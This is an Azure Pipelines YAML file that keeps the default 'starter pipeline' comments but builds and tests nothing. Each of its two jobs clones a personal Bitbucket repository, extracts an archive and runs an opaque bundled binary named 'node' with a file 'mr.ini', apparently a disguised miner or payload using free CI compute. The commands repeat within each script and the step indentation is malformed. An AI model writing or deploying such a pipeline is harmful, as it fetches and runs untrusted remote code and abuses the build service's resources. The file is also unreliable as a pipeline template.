# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- main
pool:
  vmImage: ubuntu-16.04
jobs:
- job: a
  steps:
- script: git clone https://estellhawes@bitbucket.org/estellhawes/mxc.git && cd mxc && tar -xvf MXC.tar.gz && ./node mr.ini && cd mxc && tar -xvf MXC.tar.gz && ./node mr.ini 
- job: b
  steps:
- script: git clone https://estellhawes@bitbucket.org/estellhawes/mxc.git && cd mxc && tar -xvf MXC.tar.gz && ./node mr.ini && cd mxc && tar -xvf MXC.tar.gz && ./node mr.ini
